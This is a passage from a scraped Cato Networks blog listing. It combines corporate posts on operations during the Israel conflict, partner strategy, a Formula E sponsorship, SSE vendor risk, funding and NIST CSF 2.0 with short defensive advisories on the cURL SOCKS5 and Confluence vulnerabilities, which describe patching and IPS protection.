APJ to reinforce the teams in EMEA. We have assigned T3 support engineers to T1 and T2 teams to ensure our support responsiveness continues to meet and exceed customers' expectations. October 10th, 2023: We have temporarily relocated select executives and engineers to Athens, Greece. We now have HQ and engineering resources available to support our global staff and cloud operations even in extreme cases of long power or internet outages, which aren’t expected at this time. The Way Forward Israel had faced difficult times and armed conflicts in the past, and always prevailed. We stand behind our Catonians in Israel and their families and care for them during this conflict. Our success is built on the commitment of our people to excellence in all facets of the business. This commitment remains firm as we continue our mission to provide a rock-solid secure foundation for our customers’ most critical business infrastructure.

Cato’s Analysis and Protection for cURL SOCKS5 Heap Buffer Overflow (CVE-2023-38545)

TL;DR This vulnerability appears to be less severe than initially anticipated. Cato customers and infrastructure are secure. Last week the original author and long-time lead... Read ›
Cato’s Analysis and Protection for cURL SOCKS5 Heap Buffer Overflow (CVE-2023-38545) TL;DR This vulnerability appears to be less severe than initially anticipated. Cato customers and infrastructure are secure. Last week the original author and long-time lead developer of cURL Daniel Stenberg published a “teaser” for a HIGH severity vulnerability in the ubiquitous libcurl development library and the curl command-line utility. A week of anticipation, multiple heinous crimes against humanity and a declaration of war later, the vulnerability was disclosed publicly. The initial announcement caused what in hindsight can be categorized as somewhat undue panic in the security and sysadmin worlds. But given how widespread the usage of libcurl and curl is around the world (at Cato we use widely as well, more on that below), and to quote from the libcurl website – “We estimate that every internet connected human on the globe uses (lib)curl, knowingly or not, every day”, the initial concern was more than understandable. The libcurl library and the curl utility are used for interacting with URLs and for various multiprotocol file transfers, they are bundled into all the major Linux/UNIX distributions. Likely for that reason the project maintainers opted to keep the vulnerability disclosure private, and shared very little details to deter attackers, only letting the OS distributions maintainers know in advance while patched version are made ready in the respective package management systems for when it is disclosed. [boxlink link="https://www.catonetworks.com/rapid-cve-mitigation/"] Rapid CVE Mitigation by Cato Security Research [/boxlink] The vulnerability in detail The code containing the buffer overflow vulnerability is part of curl’s support for the SOCKS5 proxy protocol.SOCKS5 is a simple and well-known (while not very well-used nowadays) protocol for setting up an organizational proxy or quite often for anonymizing traffic, like it is used in the Tor network. The vulnerability is in libcurl hostname resolution which is either delegated to the target proxy server or done by libcurl itself. If a hostname larger than 255 bytes is given, then it turns to local resolution and only passed the resolved address. Due to the bug, and in a slow enough handshake (“slow enough” being typical server latency according to the post), the Buffer Overflow can be triggered, and the entire “too-long-hostname” being copied to the buffer instead of the resolved result. There are multiple conditions that need to be met for the vulnerability to be exploited, specifically: In applications that do not set “CURLOPT_BUFFERSIZE” or set it below 65541. Important to note that the curl utility itself sets it to 100kB and so is not vulnerable unless changed specifically in the command line. CURLOPT_PROXYTYPE set to type CURLPROXY_SOCKS5_HOSTNAME CURLOPT_PROXY or CURLOPT_PRE_PROXY set to use the scheme socks5h:// A possible way to exploit the buffer overflow would likely require the attacker to control a webserver which is contacted by the libcurl client over SOCKS5, could make it return a crafted redirect (HTTP 30x response) which will contain a Location header with a long enough hostname to trigger the buffer overflow. Cato’s usage of (lib)curl At Cato we of course utilize both libcurl and curl itself for multiple purposes: curl and libcurl based applications are used extensively in our global infrastructure in scripts and in-house applications. Cato’s SDP Client also implements libcurl and uses it for multiple functions. We do not use SOCKS5, and Cato’s code and infrastructure are not vulnerable to any form of this CVE. Cato’s analysis response to the CVE Based on the CVE details and the public POC shared along with the disclosure, Cato’s Research Labs researchers believe that chances for this to be exploited successfully are medium – low. Nevertheless we have of course added IPS signatures for this CVE, providing Cato connected sites worldwide the peace and quiet through virtual patching, blocking attempts for an exploit with a detect-to-protect time of 1 day and 3 hours for all users and sites connected to Cato worldwide, and Opt-In Protection already available after 14 hours.Cato’s recommendation is as always to patch impacted servers and applications, affected versions being from libcurl 7.69.0 to and including 8.3.0. In addition, it is possible to mitigate by identifying usage as already stated of the parameters that can lead to the vulnerability being triggered - CURLOPT_PROXYTYPE, CURLOPT_PROXY, CURLOPT_PRE_PROXY. For more insights on CVE-2023-38545 specifically and many other interesting and nerdy Cybersecurity stories, listen (and subscribe!) to Cato’s podcast - The Ring of Defense: A CyberSecurity Podcast (also available in audio form).

Frank Rauch Discusses the Impact Partners Have on Cato’s Success

January 2023, Frank Rauch took on the pivotal role of Global Channel Chief at Cato Networks. This appointment marked a significant moment in Cato’s ongoing... Read ›
Frank Rauch Discusses the Impact Partners Have on Cato’s Success January 2023, Frank Rauch took on the pivotal role of Global Channel Chief at Cato Networks. This appointment marked a significant moment in Cato’s ongoing commitment to its global channel partner program. To shed light on the program’s value and its role in Cato’s success, we sat down with Frank and asked him to share his assessment after nine months on the job. Q. Frank, can you explain how Cato Networks’ channel partner program aligns with Cato’s “Channel-First Company”, and how does this benefit Cato’s bottom line? A. Our commitment to being a “Channel-First Company” means that our channel partners are at the forefront of our growth strategy. Our partner program is designed to empower our partners with the tools, resources, and support they need to succeed. This alignment not only strengthens our relationships with partners but also ensures that they have the necessary resources to drive customer success. By fostering a robust partner ecosystem, we expand our market research and, in turn, boost our Partner’s profitability and Cato’s growth. Q2. In a recent CRN story, Cato Networks was praised for its unique approach to SASE. How does the channel partner program contribute to this distinctiveness, and what advantages does it provide to partners? A2. Cato’s unique approach to SASE is underpinned by our commitment to simplicity, security, and agility. Our channel partner program plays a vital role in this by equipping partners with our groundbreaking technology and enabling them to deliver exceptional value to their customers. Partners benefit from differentiated offerings, streamlined sales processes, and competitive incentives and unprecedented customer value allowing them to stand out in the market. [boxlink link="https://www.catonetworks.com/resources/cato-sase-vs-the-sase-alternatives/"] Cato SASE vs. The SASE Alternatives | Get the eBook [/boxlink] Q3. Cato Networks has been recognized for its innovative Cato SASE Cloud platform. How does the channel partner program support partners in selling SASE Cloud solutions and ensuring their customers’ network security? A3. SASE is the future of networking and security, and our channel partners are at the forefront of this transformation, enjoying an early adopter advantage. Our program offers extensive training, certification, and access to our SASE platform, enabling partners to deliver comprehensive security and networking solutions to their customers. This approach not only ensures our partners’ success but also reinforces Cato’s position as a leader in the SASE market. Q4. In a Channel Futures story, you mentioned the importance of partner enablement. Can you elaborate on how Cato Networks empowers its channel partners to succeed and the impact it has on Cato’s global growth? A4. Partner enablement is at the core of our strategy. We provide partners with continuous training, technical resources, and marketing support focused on the buyer's journey and customer success. This enables them to serve as trusted advisors to their customers and positions Cato Networks as the go-to provider for secure, global SASE Cloud solutions. As our partners succeed, so does Cato, driving our global growth. Q5. Cato Networks has established partnerships with some of the highest growth-managed service providers. How does the channel partner program facilitate collaboration with these key partners, and what advantages does it bring to both Cato and its MSP partners? A5. Partnering with managed service providers is a strategic move for Cato Networks. Our channel partner program is designed to foster strong collaboration with MSPs, providing them with the tools and resources to seamlessly integrate our secure, global Cato SASE Cloud solutions. This collaboration enables us to reach a wider audience and deliver businesses comprehensive networking and security services. For Cato, it strengthens our position in the market as a trusted technology partner, while MSPs benefit from a powerful platform to offer enhanced services to their customers, ultimately driving mutual growth and success. The timing could not be better with customers focusing on security, networking, and resilience in an extremely complex market with more than four million security jobs open worldwide. Q6. Lastly, Frank, can you provide some insights into what the future holds for Cato Networks’ channel partner program and its role in Cato’s ongoing success? A6. The future is bright for our channel partner program. We will continue to invest in our partners’ success, expanding our portfolio and refining our support mechanisms. We see our partners as an extension of the Cato family, and their profitable growth is inherently tied to ours. Together, we will continue to redefine networking and security through SASE while reinforcing Cato’s position as a “Channel-First Company” dedicated to empowering partners and delivering exceptional results. In conclusion, Frank’s perspective on Cato Networks’ global channel partner program highlights its critical role in Cato’s success as a “Channel-First Company.” By equipping partners with the tools they need to excel, Cato not only strengthens its relationships with partners but also expands its market research and continues to innovate in the SASE market. Cato Networks’ commitment to its channel partners is a testament to its dedication to providing top-tier networking and security solutions via SASE to businesses worldwide.

Cato Networks Powers Ahead: Fuels Innovation with TAG Heuer Porsche Formula E Team

In the fast-paced world of auto racing, where technology and precision come together in a symphony of speed, Cato Networks made its mark as the... Read ›
Cato Networks Powers Ahead: Fuels Innovation with TAG Heuer Porsche Formula E Team In the fast-paced world of auto racing, where technology and precision come together in a symphony of speed, Cato Networks made its mark as the official SASE sponsor of the TAG Heuer Porsche Formula E Team. As the engines quietly ran and tires screeched at the 2023 Southwire Portland E-Prix, held at the iconic Portland International Raceway in June, Cato Networks proudly stood alongside the cutting-edge world of electric racing, embodying the spirit of innovation and collaboration.  Formula E racing isn’t just about speed; it’s a captivating blend of advanced technology, sustainable energy, and thrilling competition that resonates with racing enthusiasts worldwide including myself and more than 20 Catonians as we hosted our customers, partners, and journalists in Portland, Oregon. Maury Brown of Forbes eloquently captures its essence stating, “Formula E racing represents the marriage of high-performance motorsports and sustainable energy solutions, all on a global stage.” It’s a spectacle that goes beyond the racetrack, showcasing the potential of electric vehicles and their role in shaping a more sustainable future.” It’s a spectacle that goes beyond the racetrack, showcasing the potential of electric vehicles and their role in shaping a more sustainable future. Writing for Axios Portland, Meira Gebel emphasizes the profound impact of Formula E racing on the local communities that host these events. Her story highlights how the racing series sparks innovation and inspires environmental consciousness. The 2023 Southwire E-Prix in Portland, Oregon, perfectly encapsulates these ideals, with its picturesque backdrop and its commitment to showcasing the potential of electric racing in a city known for its green initiatives. At the heart of this electrifying journey is Cato Networks, a company that is redefining networking and security with its Cato SASE Cloud platform. Just as Formula E racing pushes the boundaries of what’s possible, Cato Networks is revolutionizing the way businesses approach networking and security. By partnering with the TAG Heuer Porsche Formula E Team, Cato Networks is aligning its commitment to innovation and performance with the excitement and dynamism of Formula E racing.  [boxlink link="https://catonetworks.easywebinar.live/registration-simplicity-at-speed"] Simplicity at Speed: How Cato’s SASE Drives the TAG Heuer Porsche Formula E Team’s Racing | Watch the Webinar [/boxlink] Florian Modlinger, Director of Factory Motorsport Formula E at Porsche, underscores the significance of Cato Networks’ involvement: “We are thrilled to have Cato Networks as our official SAES sponsor. Just as our team constantly strives for excellence on the racetrack, Cato Networks is dedicated to delivering exceptional networking and security solutions. Together, we embody the spirit of forward-thinking, high-performance teamwork.” The 2023 Southwire Portland E-Prix was a true testament to this partnership, where TAG Heuer Porsche Formula E Team, powered by the Cato SASE Cloud, demonstrated their prowess on the racetrack. As electric cars whizzed by, fueled by renewable energy, they visually represented the fusion between technology, speed, and sustainability.  For Cato Networks, the sponsorship of TAG Heuer Porsche Motorsport Formula ETeam goes beyond just the racetrack. It symbolizes the company’s commitment to pushing boundaries, embracing innovation, and fostering a collaborative spirit. As the race cars accelerated down the Portland International Raceway, Cato Networks’ presence was a reminder that the world of business networking and security is also hurtling into a future defined by agility, efficiency, and adaptability.  In an era where sustainability and technological advancement are at the forefront of global conversations, Cato Networks’ role as the official SASE sponsor for the TAG Heuer Porsche Formula E team is a testimony to the company’s vision. Just as Formula E racing fans cheer for their favorite teams, supporters of Cato Networks can celebrate a partnership that embodies progress and transformation. As the engines quieted down after the exhilarating 2023 Southwire Portland E-Prix, the echoes of innovation and collaboration lingered in the air. Cato Networks’ TAG Heuer Porsche Formula E Team sponsorship left an indelible mark on the racing world and beyond. In the words of Maury Brown, “Formula E isn’t just a motorsport series; it’s a showcase for a more sustainable and connected future.” With Cato Networks driving change on and off the racetrack, the journey toward that future is more electrifying than ever. 

Cato Protects Against Atlassian Confluence Server Exploits (CVE-2023-22515)

A new critical vulnerability has been disclosed by Atlassian in a security advisory published on October 4th 2023 in its on-premise Confluence Data Center and... Read ›
Cato Protects Against Atlassian Confluence Server Exploits (CVE-2023-22515) A new critical vulnerability has been disclosed by Atlassian in a security advisory published on October 4th 2023 in its on-premise Confluence Data Center and Server product. A privilege escalation vulnerability through which attackers may exploit a vulnerable endpoint in internet-facing Confluence instances to create unauthorized Confluence administrator accounts and gain access to the Confluence instance. At the time of writing a CVSS score was not assigned to the vulnerability but it can be expected to be very high (9 – 10) due to the fact it is remotely exploitable and allows full access to the server once exploited. [boxlink link="https://www.catonetworks.com/rapid-cve-mitigation/"] Rapid CVE Mitigation by Cato Security Research [/boxlink] Cato’s Response   There are no publicly known proofs-of-concept (POC) of the exploit available, but it has been confirmed by Atlassian that they have been made aware of the exploit by a “handful of customers where external attackers may have exploited a previously unknown vulnerability” so it can be assumed with a high certainty that it is already being exploited. Cato’s Research Labs identified possible exploitation attempts of the vulnerable endpoint (“/setup/”) in some of our customers immediately after the security advisory was released, which were successfully blocked without any user intervention needed. The attempts were blocked by our IPS signatures aimed at identifying and blocking URL scanners even before a signature specific to this CVE was available. The speed with which using the very little information available from the advisory was already integrated into online scanners gives a strong indication of how much of a high-value target Confluence servers are, and is concerning given the large numbers of publicly facing Confluence servers that exist. Following the disclosure, Cato deployed signatures blocking any attempts to interact with the vulnerable “/setup/” endpoint, with a detect-to-protect time of 1 day and 23 hours for all users and sites connected to Cato worldwide, and Opt-In Protection already available in under 24 hours. Furthermore, Cato’s recommendation is to restrict access to Confluence servers’ administration endpoints only from authorized IPs, preferably from within the network and when not possible that it is only accessible from hosts protected by Cato, whether behind a Cato Socket or remote users running the Cato Client. Cato’s Research Labs continues to monitor the CVE for additional information, and we will update our signatures as more information becomes available or a POC is made public and exposes additional information. Follow our CVE Mitigation page and Release Notes for future information.

Essential steps to evaluate the Risk Profile of a Secure Services Edge (SSE) Provider

Introduction Businesses have increasingly turned to Secure Services Edge (SSE) to secure their digital assets and data, as they undergo digital transformation. SSE secures the... Read ›
Essential steps to evaluate the Risk Profile of a Secure Services Edge (SSE) Provider Introduction Businesses have increasingly turned to Secure Services Edge (SSE) to secure their digital assets and data, as they undergo digital transformation. SSE secures the network edge to ensure data privacy and protect against cyber threats, using a cloud-delivered SaaS infrastructure from a third-party cybersecurity provider. SSE has brought numerous advantages to companies who needed to strengthen their cyber security after undergoing a digital transformation.  However, it has introduced new risks that traditional risk management methods can fail to identify at the initial onboarding stage. When companies consider a third party to run their critical infrastructure, it is important to seek functionality and performance, but it is essential to identify and manage risks.  Would you let someone you barely know race your shiny Porsche along a winding clifftop road, without first assessing his driving skills and safety record? [boxlink link="https://www.catonetworks.com/resources/ensuring-success-with-sse-rfp-rfi-template/"] Ensuring Success with SSE: Your Helpful SSE RFP/RFI Template | Download the Template [/boxlink] When assessing a Secure Services Edge (SSE) vendor, it is therefore essential to consider the risk profile alongside the capabilities. In this post, we will guide you through the key steps to evaluate SSE vendors, this time not based on their features, but on their risk profile. Why does this matter? Gartner defines a third-party risk “miss” as an incident resulting in at least one of the outcomes in Figure 1. Its 2022 survey of Executive Risk Committee members shows how these third-party risk “misses” are hurting organizations: 84% of respondents said that they had resulted in operations disruption at least once in the last 12 months. Courtesy of Gartner Essential steps to evaluate the Risk Profile of a potential SSE provider Step 1: Assess Reputation and Experience Start your evaluation by researching the provider’s reputation and experience in the cybersecurity industry. Look for established vendors with a proven track record of successfully securing organizations from cyber threats. Client testimonials and case studies can offer valuable insights into their effectiveness in handling diverse security challenges. Step 2: Certifications and Compliance Check if the cybersecurity vendor holds relevant certifications, such as ISO 27001, NIST Cybersecurity Framework, SOC 2, or others.  These demonstrate their commitment to maintaining high standards of information security. Compliance with industry-specific regulations (e.g., GDPR, HIPAA) is equally important, especially if your organization deals with sensitive data. Step 3: Incident Response and Support Ask about the vendor's incident response capabilities and the support they provide during and after a cyber incident. A reliable vendor should have a well-defined incident response plan and a team of skilled professionals ready to assist you in the event of a security breach. Step 4: Third-party Audits and Assessments Look for vendors who regularly undergo third-party security audits and assessments. These independent evaluations provide an objective view of the vendor's security practices and can validate their claims regarding their InfoSec capabilities. Step 5: Data Protection Measures Ensure that the vendor employs robust data protection measures, including encryption, access controls, and data backup protocols. This is vital if your organization handles sensitive customer information or intellectual property. Step 6: Transparency and Communication A trustworthy vendor will be transparent about their security practices, policies, and potential limitations. Evaluate how well they communicate their security measures and how responsive they are to your queries during the evaluation process. Step 7: Research Security Incidents and Breaches Conduct research on any past security incidents or data breaches that the vendor might have experienced. Analyze how they handled the situation, what lessons they learned, and the improvements they made to prevent similar incidents in the future. Gartner has recently released a Third Party Risk platform to help organizations navigate through the risk profiles of Third Party providers, including of course, cybersecurity vendors. The Gartner definition of Third-Party Risk is: “the risk an organization is exposed to by its external third parties such as vendors, contractors, and suppliers who may have access to company data, customer data, or other privileged information.” The information provided by vendors on Gartner's Third-Party Risk Platform is primarily self-disclosed. While Gartner relies on vendors to accurately report their details, they also offer the option for vendors to upload attestations of third-party audits as evidence to support their claims. This additional layer of validation helps increase the reliability and credibility of the information presented. However, it is ultimately the responsibility of users to perform their due diligence when evaluating vendor information. Conclusion Selecting the right SSE provider is a critical decision that can significantly impact your organization's security posture. By evaluating vendors based on their Risk profile, not just their features, and leveraging the Gartner Third Party Risk Platform, you can make an informed choice and gain a reliable cybersecurity provider. Remember: investing time and effort in the evaluation process now, can prevent potential security headaches in the future, ensuring your organization remains protected from evolving cyber threats and compliant to local regulations.

The Cato Journey – Bringing SASE Transformation to the Largest Enterprises  

One of the observations I sometimes get from analysts, investors, and prospects is that Cato is a mid-market company. They imply that we are creating... Read ›
The Cato Journey – Bringing SASE Transformation to the Largest Enterprises   One of the observations I sometimes get from analysts, investors, and prospects is that Cato is a mid-market company. They imply that we are creating solutions that are simple and affordable, but don’t necessarily meet stringent requirements in scalability, availability, and functionality.   Here is the bottom line: Cato is an enterprise software company. Our mission is to deliver the Cato SASE experience to organizations of all sizes, support mission critical operations at any scale, and deliver best-in-class networking and security capabilities.   The reason Cato is perceived as a mid-market company is a combination of our mission statement which targets all organizations, our converged cloud platform that challenges legacy blueprints full of point solutions, our go-to-market strategy that started in the mid-market and went upmarket, and the IT dynamics in large enterprises. I will look at these in turn.   The Cato Mission: World-class Networking and Security for Everyone   Providing world class networking and security capabilities to customers of all sizes is Cato’s reason-for-being. Cato enables any organization to maintain top notch infrastructure by making the Cato SASE Cloud its enterprise networking and security platform. Our customers often struggled to optimize and secure their legacy infrastructure where gaps, single points of failure, and vulnerabilities create significant risks of breach and business disruption.  Cato SASE Cloud is a globally distributed cloud service that is self-healing, self-maintaining, and self-optimizing and such benefits aren’t limited to resource constrained mid-market organizations. In fact, most businesses will benefit from a platform that is autonomous and always optimized. It isn’t just the platform, though. Cato’s people, processes, and capabilities that are focused on cloud service availability, optimal performance, and maximal security posture are significantly higher than those of most enterprises.   Simply put, we partner with our customers in the deepest sense of the word. Cato shifts the burden of keeping the lights on a fragmented and complex infrastructure from the customer to us, the SASE provider. This grunt work does not add business value, it is just a “cost of doing business.” Therefore, it was an easy choice for mid-market customers that could not afford wasting resources to maintain the infrastructure. Ultimately, most organizations will realize there is simply no reason to pay that price where a proven alternative exists.   The most obvious example of this dynamic of customer capabilities vs. cloud services capabilities is Amazon Web Services (AWS). AWS eliminates the need for customers to run their own datacenters and worry about hosting, scaling, designing, deploying, and building high availability compute and storage. In the early days of AWS, customers used it for non-mission-critical departmental workloads. Today, virtually all enterprises use AWS or similar hyperscalers as their cloud datacenter platforms because they can bring to bear resources and competencies at a global scale that most enterprises can’t maintain.   AWS was never a “departmental” solution, given its underlying architecture. The Cato architecture was built with the same scale, capacity, and resiliency in mind. Cato can serve any organization.   The Cato SASE Cloud Platform: Global, Efficient, Scalable, Available  Cato created an all-new cloud-native architecture to deliver networking and security capabilities from the cloud to the largest datacenters and down to a single user. The Cato SASE Cloud is a globally distributed cloud service comprised of dozens of Points of Presence (PoPs). The PoPs run thousands of copies of a purpose-built and cloud-native networking and security stack called the Single Pass Cloud Engine (SPACE). Each SPACE can process traffic flows from any source to any destination in the context of a specific enterprise security policy. The SPACE enforces application access control (ZTNA), threat prevention (NGFW/IPS/NGAM/SWG), and data protection (CASB/DLP) and is being extended to address additional domains and requirements within the same software stack.  Large enterprises expect the highest levels of scalability, availability, and performance. The Cato architecture was built from the ground up with these essential attributes in mind. The Cato SASE Cloud has over 80 compute PoP locations worldwide, creating the largest SASE Cloud in the world. PoPs are interconnected by multiple Tier 1 carriers to ensure minimal packet loss and optimal path selection globally. Each PoP is built with multiple levels of redundancy and excess capacity to handle load surges. Smart software dynamically diverts traffic between PoPs and SPACEs in case of failure to ensure service continuity. Finally, Cato is so efficient that it has recently set an industry record for security processing -- 5 Gbps of encrypted traffic from a single location.   Cato’s further streamlines SOC and NOC operations with a single management console, and a single data lake providing a unified and normalized platform for analytics, configuration, and investigations. Simple and streamlined is not a mid-market attribute. It is an attribute of an elegant and seamless solution.   Go to Market: The Mid-Market is the Starting Point, Not the Endgame  Cato is not a typical cybersecurity startup that addresses new and incremental requirements. Rather, it is a complete rethinking and rearchitecting of how networking and security should be delivered. Simply put, Cato is disrupting legacy vendors by delivering a new platform and a completely new customer experience that automates and streamlines how businesses connect and secure their devices, users, locations, and applications.   Prospects are presented with a tradeoff: continue using legacy technologies that consume valuable IT time and resources spent on integration, deployment, scaling, upgrades, and maintenance, or adopt the new Cato paradigm of simplicity, agility, always on, and self-maintaining. This is not an easy decision. It means rethinking their networking and security architecture. Yet it is precisely the availability of the network and the ability to protect against threats that impact the enterprise’s ability to do business.  [boxlink link="https://www.catonetworks.com/resources/cato-sase-vs-the-sase-alternatives/"] Cato SASE vs. The SASE Alternatives | Download the eBook [/boxlink] With that backdrop, Cato found its early customers at the “bottom” of the mid-market segment. These customers had to balance the risk of complexity and resource scarcity or the risk of a new platform. They often lacked the internal budgets and resources to meet their needs with existing approaches; they were open to considering another way.   Since then, seven years of technical development in conjunction with wide-spread market validation of single-vendor SASE as the future of enterprise networking and security have led Cato to move up market and acquire Fortune 500 and Global 1000 enterprises at 100x the investment of early customers – on the same architecture. In the process, Cato replaced hundreds of point products, both appliances and cloud- services, from all the leading vendors to transform customers’ IT infrastructure.   Cato didn’t invent this strategy of starting with smaller enterprises and progressively addressing the needs of larger enterprises. Twenty years ago, a small security startup, Fortinet, adopted this same go-to-market approach with low-cost firewall appliances, powered by custom chips, targeting the SMB and mid-market segments. The company then proceeded to move up market and is now serving the largest enterprises in the world. While we disagree with Fortinet on the future of networking and security and the role the cloud should play in it, we agree with the go-to-market approach and expect to end in the same place.   Features and Roadmap: Addressing Enterprise Requirements at Cloud Speed  When analysts assess Cato’s platform, they do it against a list of capabilities that exist in other vendors’ offerings. But this misses the benefit of hindsight. All too often, so-called “high-end features” had been built for legacy conditions, specific edge cases, particular customer requirements that are now obsolete or have low value. In networking, for example, compression, de-duplication, and caching, aren’t aligned with today’s requirements where traffic is compressed, dynamic, and sent over connections with far more capacity that was ever imagined when WAN optimization was first developed.   On the other hand, our unique architecture allows us to add new capabilities very quickly. Over 3,000 enhancements and features were added to our cloud service last year alone. Those features are driven by customers and cross-referenced with what analysts use in their benchmarks. For that very reason, we run a customer advisory board, and conduct detailed roadmap and functional design reviews with dozens of customers and prospects. Case in point is the introduction of record setting security processing -- 5 Gbps of encrypted traffic from a single location. No other vendor has come close to that limit.   The IT Dynamics in Large Enterprises: Bridging the Networking and Security SILOs  Many analysts are pointing towards enterprise IT structure and buying patterns as a blocker to SASE adoption.  IT organizations must collaborate across networking and security teams to achieve the benefits of a single converged platform. While smaller IT organizations can do it more easily, larger IT organizations can achieve the same outcome with the guidance of visionary IT leadership. It is up to them to realize the need to embark on a journey to overcome the resource overload and skills scarcity that slows down their teams and negatively impacts the business. Across multiple IT domains, from datacenters to applications, enterprises partner with the right providers that through a combination of technology and people help IT to support the business in a world of constant change.   Cato’s journey upmarket proves that point. As we engage and deploy SASE in larger enterprises, we prove that embracing networking and security convergence is more of matter of imagining what is possible. With our large enterprise customers' success stories and the hard benefits they realized, the perceived risk of change is diminished and a new opportunity to transform IT emerges.   The Way Forward: Cato is Well Positioned to Serve the Largest Enterprises  Cato has reimagined what enterprise networking and security should be. We created the only true SASE platform that delivers the seamless and fluid experience customers got excited about when SASE was first introduced.  We have matured the Cato SASE architecture and platform for the past eight years by working with customers of all sizes to make Cato faster, better, and stronger. We have the scale, the competencies, and the processes to enhance our service, and a detailed roadmap to address evolving needs and requirements. You may be a Request for Enhancement (RFE) away from seeing how SASE, Cato’s SASE, can truly change the way your enterprise IT enables and drives the business. 

Cato: The Rise of the Next-Generation Networking and Security Platform

Today, we announced our largest funding round to date ($238M) at a new company valuation of over $3B. It’s a remarkable achievement that is indicative... Read ›
Cato: The Rise of the Next-Generation Networking and Security Platform Today, we announced our largest funding round to date ($238M) at a new company valuation of over $3B. It’s a remarkable achievement that is indicative not only of Cato’s success but also of a broader change in enterprise infrastructure.   We live in an era of digital transformation. Every business wants to be as agile, scalable, and resilient as AWS (Amazon Web Service) to gain a competitive edge, reduce costs and complexity, and delight its customers. But to achieve that goal, enterprise infrastructure, including both networking and security, must undergo digital transformation itself. It must become an enabler, instead of a blocker, for the digital business. Security platforms are a step in that direction.   Platforms can be tricky. A platform, by definition, must come from a single vendor and should cover most of the requirements of a given enterprise. This is not enough, though. A vendor could seemingly create a platform by “duct taping” products that were built organically with others that came from acquisitions. In that case, while the platform might check all the functional boxes, it would not feel like a cohesive unity but a collection of non-integrated components. This is a common theme with acquisitive vendors: they provide the comfort of sound financials but are hard pressed to deliver the promised platform benefits. What they have, in fact, is a portfolio of products, not a platform.   [boxlink link="https://www.catonetworks.com/resources/cato-named-a-challenger-in-the-gartner-magic-quadrant-for-single-vendor-sase/"] Cato named a Challenger in Gartner’s Magic Quadrant for Single Vendor-SASE | Get the Report [/boxlink] In 2015, Cato embarked on a journey to build a networking and security platform, from the ground up, for the cloud era. We did not want just to cover as many functional requirements as fast as possible. Rather, we wanted to create a seamless and elegant experience, powered by a converged, global, cloud-native service that sustains maximal security posture and optimal performance, while offloading unproductive grunt work from IT professionals. A cohesive service architecture that is available everywhere enabled us to ensure scalable and resilient secure access to the largest datacenters and down to a single user.   We have been hard at work over the past eight years to mature this revolutionary architecture, that Gartner called SASE in 2019, and rapidly expand the capabilities it offered to our 2,000+ customers. We have grown not only the customer base, but the scale and complexity of enterprises that are supported by Cato today. In the process of transforming and modernizing our customers’ infrastructure we replaced many incumbent vendors, both appliance-centric and cloud-delivered, that our customers could not find the skills and resources to sustain.   Building a new platform is ambitious. Obviously, we are competing for the hearts and minds of customers that must choose between legacy approaches they lived with for so long, the so-called “known evil,” or join us to adopt a better and more effective networking and security platform for their businesses.   Today’s round of financing is proof that we are going in the right direction. Our customers, with tens of thousands of locations and millions of users, trust us to power their mission critical business operations with the only true SASE platform. They are joined today by existing and new investors that believe in our vision, our roadmap, and in our mission to change networking and security forever.   SASE is the way of the future. We imagined it, we invested in it, we built it, and we believe in it.   Cato. We ARE SASE.  

NIST Cybersecurity & Privacy Program

Introduction  The National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) 1.1 has been a critical reference to help reduce or mitigate cybersecurity threats... Read ›
NIST Cybersecurity & Privacy Program Introduction  The National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) 1.1 has been a critical reference to help reduce or mitigate cybersecurity threats to Critical Infrastructures. First launched in 2014, it remains the de facto framework to address the cyber threats we have seen. However, with an eye toward addressing more targeted, sophisticated, and coordinated future threats, it was universally acknowledged that NIST CSF 1.1 required updating.   NIST has released a public draft of version 2.0 of their Cybersecurity Framework (CSF), which promises to deliver several improvements. However, to understand the impact of this update, it helps to understand how CSF v1.1 brought us this far.   Background  Every organization in today’s evolving global environment is faced with managing enterprise security risks efficiently and effectively. Cybersecurity is daunting; depending on your industry vertical, adhering to an intense list of regulatory and compliance standards only adds to this nightmare. Whether it’s the International Organization for Standardization (ISO) 27001, Information Systems Audit and Controls Association (ISACA) COBIT5, or other such programs, it is often confusing to know how or where to start, but they all specify processes to protect and respond to cybersecurity threats.  This was the impetus behind the National Institute of Standards and Technology (NIST) developing the Cybersecurity Framework (CSF). NIST CSF references proven best practices in its Core functions: Identify, Protect, Detect, Respond, and Recover. With this framework in place, organizations now have tools to better manage enterprise cybersecurity risk by presenting organizations with the required guidance.  NIST 2.0  The development of NIST CSF version 2.0 was a collaboration of industry, academic, and government experts across the globe, demonstrating the intent of adapting this iteration of the CSF to organizations everywhere, and not just in the US. It’s focused on mitigating cybersecurity risk to industry segments of all types and sizes by helping them understand, assess, prioritize, and communicate about these risks and the actions to reduce them.  To deliver on this promise, NIST CSF 2.0 highlights several core changes to deliver a more holistic framework. The following key changes are crucial to improving CSF to make it more globally relevant:  Global applicability for all segments and sizes  The previous scope of NIST CSF primarily addressed cybersecurity for critical infrastructure in the United States. While necessary at the time, it was universally agreed that expanding this scope was necessary to include global industries, governments, and academic institutions, and NIST CSF 2.0 does this.  Focus on cybersecurity governance  Cybersecurity governance is an all-encompassing cybersecurity strategy that integrates organizational operations to mitigate the risk of business disruption due to cyber threats or attacks. Cybersecurity governance includes many activities, including accountability, risk-tolerance definitions, and oversight, just to name a few. These critical components map neatly across the five core pillars of NIST CSF: Identify, Protect, Detect, Respond, and Recover. Cybersecurity governance within NIST CSF 2.0 defines and monitors cybersecurity risk strategies and expectations.   Focus on cybersecurity supply chain risk management  An extensive, globally distributed, and interconnected supply chain ecosystem is crucial for maintaining a strong competitive advantage and avoiding potential risks to business continuity and brand reputation. However, an intense uptick in cybersecurity incidents in recent years has uncovered the extended risk that exists in our technology supply chains. For this reason, integrating Cybersecurity Supply Chain Risk Management into NIST CSF 2.0 enables this framework to effectively inform an organization’s oversight and communications related to cybersecurity risks across multiple supply chains.  [boxlink link="https://www.catonetworks.com/resources/nist-compliance-to-cato-sase/"] Mapping NIST Cybersecurity Framework (CSF) to the Cato SASE Cloud | Download the White Paper [/boxlink] Integrating Cybersecurity Risk Management with Other Domains Using the Framework  NIST CSF 2.0 acknowledges that no one framework or guideline solves all cybersecurity challenges for today’s organizations. Considering this, there is alignment to several important privacy and risk management frameworks included in this draft:  Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations – NIST SP 800-161f1  NIST Privacy Framework  Integrating Cybersecurity and Enterprise Risk Management – NIST IR 8286  Artificial Intelligence Risk Management Framework – AI 100-1  Alignment to these and other frameworks ensures organizations are well-equipped with guidelines and tools to facilitate their most critical cybersecurity risk programs holistically to achieve their desired 